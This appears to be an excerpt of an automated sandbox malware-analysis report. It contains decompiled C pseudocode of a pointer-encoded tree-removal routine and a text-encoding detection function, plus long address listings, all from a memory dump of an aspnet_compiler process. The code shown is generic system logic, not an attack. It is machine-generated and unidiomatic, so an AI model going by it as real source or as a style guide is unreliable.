													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                                  0x0189b095
                                                  0x0189b09b
                                                  0x0189b09f
                                                  0x0189b0a5
                                                  0x0189b0a7
                                                  0x0189b0aa
                                                  0x0189b0ad
                                                  0x0189b0b1
                                                  0x0189b3f8
                                                  0x0189b3fa
                                                  0x0189b3ff
                                                  0x0189b419
                                                  0x0189b41b
                                                  0x0189b41b
                                                  0x0189b401
                                                  0x00000000
                                                  0x0189b0b7
                                                  0x0189b0b9
                                                  0x0189b0bc
                                                  0x0189b0c0
                                                  0x0189b0c2
                                                  0x0189b0c2
                                                  0x0189b0c4
                                                  0x0189b0c8
                                                  0x0189b0cf
                                                  0x0189b0d1
                                                  0x0189b0d1
                                                  0x0189b0da
                                                  0x0189b0dd
                                                  0x0189b0df
                                                  0x0189b0df
                                                  0x0189b0e4
                                                  0x0189b0e9
                                                  0x0189b3e2
                                                  0x0189b3e5
                                                  0x0189b3eb
                                                  0x018ea676
                                                  0x018ea67b
                                                  0x018ea67d
                                                  0x0189b3f1
                                                  0x0189b3f1
                                                  0x0189b3f1
                                                  0x0189b0ef
                                                  0x0189b0ef
                                                  0x0189b0ef
                                                  0x0189b0e9
                                                  0x0189b0f6
                                                  0x0189b28d
                                                  0x0189b28e
                                                  0x0189b293
                                                  0x0189b0fc
                                                  0x0189b0fc
                                                  0x0189b101
                                                  0x0189b104
                                                  0x0189b107
                                                  0x0189b10c
                                                  0x018ea687
                                                  0x018ea68d
                                                  0x018ea68d
                                                  0x018ea687
                                                  0x0189b112
                                                  0x0189b116
                                                  0x018ea696
                                                  0x018ea69c
                                                  0x018ea69c
                                                  0x018ea696
                                                  0x0189b120
                                                  0x0189b121
                                                  0x0189b124
                                                  0x0189b127
                                                  0x0189b12a
                                                  0x0189b12d
                                                  0x0189b132
                                                  0x018ea6a5
                                                  0x00000000
                                                  0x00000000
                                                  0x018ea6ab
                                                  0x00000000
                                                  0x0189b138
                                                  0x0189b138
                                                  0x0189b13a
                                                  0x0189b193
                                                  0x0189b197
                                                  0x0189b19d
                                                  0x0189b29c
                                                  0x0189b29f
                                                  0x0189b2a2
                                                  0x0189b2a7
                                                  0x018ea6d2
                                                  0x018ea6d8
                                                  0x018ea6d8
                                                  0x018ea6d2
                                                  0x0189b2af
                                                  0x0189b420
                                                  0x0189b422
                                                  0x0189b423
                                                  0x00000000
                                                  0x0189b2b5
                                                  0x0189b2b5
                                                  0x0189b2ba
                                                  0x018ea6e1
                                                  0x018ea6e7
                                                  0x018ea6e7
                                                  0x018ea6e1
                                                  0x0189b2c2
                                                  0x00000000
                                                  0x0189b2c8
                                                  0x0189b2cb
                                                  0x0189b2d0
                                                  0x018ea6f0
                                                  0x018ea6f6
                                                  0x018ea6f6
                                                  0x018ea6f0
                                                  0x0189b2d8
                                                  0x00000000
                                                  0x0189b2de
                                                  0x0189b2de
                                                  0x0189b2de
                                                  0x0189b2e1
                                                  0x0189b2e6
                                                  0x0189b2eb
                                                  0x018ea6ff
                                                  0x018ea705
                                                  0x018ea705
                                                  0x018ea6ff
                                                  0x0189b2f3
                                                  0x00000000
                                                  0x0189b2f9
                                                  0x0189b2fb
                                                  0x0189b2fd
                                                  0x0189b301
                                                  0x0189b303
                                                  0x0189b303
                                                  0x0189b308
                                                  0x0189b30b
                                                  0x0189b310
                                                  0x0189b312
                                                  0x0189b312
                                                  0x0189b31c
                                                  0x0189b322
                                                  0x0189b327
                                                  0x018ea70e
                                                  0x0189b335
                                                  0x0189b337
                                                  0x018ea71d
                                                  0x018ea723
                                                  0x018ea723
                                                  0x018ea71d
                                                  0x0189b340
                                                  0x0189b345
                                                  0x0189b349
                                                  0x018ea72a
                                                  0x018ea72a
                                                  0x0189b352
                                                  0x0189b357
                                                  0x0189b359
                                                  0x0189b359
                                                  0x0189b365
                                                  0x0189b367
                                                  0x0189b36c
                                                  0x00000000
                                                  0x0189b36c
                                                  0x018ea714
                                                  0x018ea714
                                                  0x0189b32f
                                                  0x0189b3b8
                                                  0x0189b3bd
                                                  0x0189b3c4
                                                  0x0189b425
                                                  0x0189b427
                                                  0x0189b429
                                                  0x0189b429
                                                  0x0189b427
                                                  0x0189b3c8
                                                  0x00000000
                                                  0x00000000
                                                  0x0189b3ce
                                                  0x0189b42f
                                                  0x0189b3d0
                                                  0x0189b3d0
                                                  0x0189b3d0
                                                  0x0189b3d7
                                                  0x0189b3da
                                                  0x0189b3da
                                                  0x00000000
                                                  0x0189b32f
                                                  0x0189b2f3
                                                  0x0189b2d8
                                                  0x0189b2c2
                                                  0x0189b2af
                                                  0x0189b1a3
                                                  0x0189b1a9
                                                  0x0189b1af
                                                  0x0189b1b2
                                                  0x0189b1b5
                                                  0x0189b1b8
                                                  0x018ea733
                                                  0x018ea739
                                                  0x018ea739
                                                  0x018ea733
                                                  0x0189b1c0
                                                  0x00000000
                                                  0x0189b1c6
                                                  0x0189b1c8
                                                  0x0189b1cb
                                                  0x0189b1ce
                                                  0x0189b1d3
                                                  0x018ea742
                                                  0x018ea748
                                                  0x018ea748
                                                  0x018ea742
                                                  0x0189b1db
                                                  0x00000000
                                                  0x0189b1e1
                                                  0x0189b1e1
                                                  0x0189b1e6
                                                  0x0189b1e9
                                                  0x0189b1ee
                                                  0x018ea751
                                                  0x0189b409
                                                  0x0189b409
                                                  0x0189b40e
                                                  0x00000000
                                                  0x00000000
                                                  0x0189b410
                                                  0x0189b22d
                                                  0x0189b22f
                                                  0x018ea790
                                                  0x018ea796
                                                  0x018ea796
                                                  0x018ea790
                                                  0x0189b23d
                                                  0x0189b243
                                                  0x0189b248
                                                  0x018ea79f
                                                  0x00000000
                                                  0x00000000
                                                  0x018ea7a5
                                                  0x00000000
                                                  0x0189b24e
                                                  0x0189b24e
                                                  0x0189b250
                                                  0x0189b374
                                                  0x0189b379
                                                  0x0189b37e
                                                  0x018ea7ae
                                                  0x018ea7b4
                                                  0x018ea7b4
                                                  0x018ea7ae
                                                  0x0189b386
                                                  0x00000000
                                                  0x0189b38c
                                                  0x0189b38e
                                                  0x018ea7bd
                                                  0x0189b394
                                                  0x0189b394
                                                  0x0189b394
                                                  0x0189b39b
                                                  0x0189b39e
                                                  0x00000000
                                                  0x0189b39e
                                                  0x0189b386
                                                  0x0189b256
                                                  0x0189b258
                                                  0x018ea7c6
                                                  0x018ea7cc
                                                  0x018ea7cc
                                                  0x018ea7c6
                                                  0x0189b261
                                                  0x0189b266
                                                  0x0189b26a
                                                  0x018ea7d3
                                                  0x018ea7d3
                                                  0x0189b273
                                                  0x0189b278
                                                  0x0189b27a
                                                  0x0189b27a
                                                  0x0189b281
                                                  0x0189b283
                                                  0x0189b285
                                                  0x0189b287
                                                  0x0189b289
                                                  0x00000000
                                                  0x0189b289
                                                  0x0189b248
                                                  0x018ea757
                                                  0x018ea757
                                                  0x0189b1f6
                                                  0x00000000
                                                  0x00000000
                                                  0x0189b1fc
                                                  0x0189b201
                                                  0x018ea760
                                                  0x018ea766
                                                  0x018ea766
                                                  0x018ea760
                                                  0x0189b209
                                                  0x0189b3a8
                                                  0x018ea76f
                                                  0x0189b3ae
                                                  0x0189b3ae
                                                  0x0189b3ae
                                                  0x0189b3b0
                                                  0x00000000
                                                  0x0189b20f
                                                  0x0189b20f
                                                  0x0189b213
                                                  0x018ea778
                                                  0x018ea77e
                                                  0x018ea77e
                                                  0x018ea778
                                                  0x0189b21b
                                                  0x00000000
                                                  0x0189b221
                                                  0x0189b223
                                                  0x018ea787
                                                  0x0189b229
                                                  0x0189b229
                                                  0x0189b229
                                                  0x0189b22b
                                                  0x00000000
                                                  0x0189b22b
                                                  0x0189b21b
                                                  0x0189b209
                                                  0x0189b1db
                                                  0x0189b142
                                                  0x0189b142
                                                  0x0189b146
                                                  0x0189b148
                                                  0x0189b14c
                                                  0x0189b14f
                                                  0x0189b154
                                                  0x0189b15b
                                                  0x018ea6b4
                                                  0x00000000
                                                  0x00000000
                                                  0x018ea6ba
                                                  0x018ea6ba
                                                  0x0189b163
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0189b163
                                                  0x0189b13a
                                                  0x0189b169
                                                  0x0189b16b
                                                  0x0189b16e
                                                  0x0189b171
                                                  0x0189b175
                                                  0x0189b178
                                                  0x018ea6c3
                                                  0x018ea6c9
                                                  0x018ea6c9
                                                  0x018ea6c3
                                                  0x0189b180
                                                  0x0189b184
                                                  0x00000000
                                                  0x0189b104
                                                  0x0189b0f6

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                  • Instruction ID: d7cc20c8556515c043708a8cf495e53e600f1727a5d94aa46bd90e87cf674c3c
                                                  • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                  • Instruction Fuzzy Hash: BED117717047158BDF26CEADE8C0B6ABBE1AF85718B2C81A8DC55CB342E731DB419750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01880D20 Relevance: .4, Instructions: 372COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 99%
                                                  			E01880D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1976d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1976920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1976920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1881174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M01881160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                                  0x01880d2b
                                                  0x01880d2e
                                                  0x01880d32
                                                  0x01880d39
                                                  0x01880d3b
                                                  0x01880d3d
                                                  0x01880d3f
                                                  0x01880d46
                                                  0x01880d4d
                                                  0x01880d54
                                                  0x01880d5b
                                                  0x01880d62
                                                  0x01880d69
                                                  0x01880d70
                                                  0x01880d77
                                                  0x01880d7e
                                                  0x01880d85
                                                  0x01880d88
                                                  0x01880d8b
                                                  0x01880d8e
                                                  0x01880d91
                                                  0x01880d94
                                                  0x01880d97
                                                  0x01880d9a
                                                  0x01880d9d
                                                  0x01880da6
                                                  0x018810e9
                                                  0x018810ee
                                                  0x01880db9
                                                  0x01880db9
                                                  0x01880dbc
                                                  0x018de9c7
                                                  0x018de9ca
                                                  0x018de9cd
                                                  0x018de9d0
                                                  0x018de9dd
                                                  0x018de9dd
                                                  0x01880dec
                                                  0x01880dec
                                                  0x01880dee
                                                  0x01880df3
                                                  0x01880ebf
                                                  0x01880ec0
                                                  0x00000000
                                                  0x01880df9
                                                  0x01880df9
                                                  0x01880e1e
                                                  0x01880e21
                                                  0x01880e24
                                                  0x01880e27
                                                  0x01880e2a
                                                  0x01880e2d
                                                  0x01880e30
                                                  0x01880e36
                                                  0x01881040
                                                  0x01881043
                                                  0x01881049
                                                  0x01881049
                                                  0x01880e3c
                                                  0x01880e3f
                                                  0x01881007
                                                  0x0188100a
                                                  0x01881010
                                                  0x01881010
                                                  0x0188100a
                                                  0x01880e3f
                                                  0x01880e58
                                                  0x01880e5d
                                                  0x01881000
                                                  0x01880e63
                                                  0x01880e63
                                                  0x01880e63
                                                  0x01880e67
                                                  0x01880e69
                                                  0x01880e69
                                                  0x01880e6d
                                                  0x01880e70
                                                  0x01880e74
                                                  0x01880e76
                                                  0x01880e76
                                                  0x01880e7a
                                                  0x01880e7c
                                                  0x01880e7c
                                                  0x01880e83
                                                  0x01880e86
                                                  0x01880e87
                                                  0x01880e89
                                                  0x01880e8b
                                                  0x01880e91
                                                  0x01880e00
                                                  0x01880e03
                                                  0x01880e03
                                                  0x01880e07
                                                  0x01880e0f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01880e0f
                                                  0x01880e97
                                                  0x01880e9c
                                                  0x0188113e
                                                  0x01881141
                                                  0x01881143
                                                  0x01880eb1
                                                  0x01880eb1
                                                  0x01880eb4
                                                  0x01880eb6
                                                  0x01881110
                                                  0x01881112
                                                  0x018dea25
                                                  0x018dea25
                                                  0x01880ec3
                                                  0x01880ec3
                                                  0x01880ecb
                                                  0x018810fe
                                                  0x01880ed1
                                                  0x01880ed1
                                                  0x01880ed1
                                                  0x01880ed3
                                                  0x01880edb
                                                  0x018dea2d
                                                  0x018dea2f
                                                  0x018dea31
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018dea37
                                                  0x018dea37
                                                  0x018dea3a
                                                  0x018dea3e
                                                  0x018dea47
                                                  0x018dea4a
                                                  0x018dea4c
                                                  0x018dea4d
                                                  0x018dea4d
                                                  0x018dea4e
                                                  0x018dea4e
                                                  0x018dea51
                                                  0x018dea52
                                                  0x018dea52
                                                  0x00000000
                                                  0x01880ee1
                                                  0x01880ee1
                                                  0x01880ee1
                                                  0x01880ee3
                                                  0x01880ee3
                                                  0x01880ee6
                                                  0x01880eec
                                                  0x018dea5b
                                                  0x018dea5d
                                                  0x01880ef6
                                                  0x01880ef8
                                                  0x018dea6f
                                                  0x018dea6f
                                                  0x01880efe
                                                  0x01880efe
                                                  0x01880f03
                                                  0x018dea7b
                                                  0x018dea7d
                                                  0x00000000
                                                  0x00000000
                                                  0x018dea83
                                                  0x018dea85
                                                  0x00000000
                                                  0x00000000
                                                  0x018dea8b
                                                  0x018dea91
                                                  0x00000000
                                                  0x00000000
                                                  0x018dea97
                                                  0x018dea9a
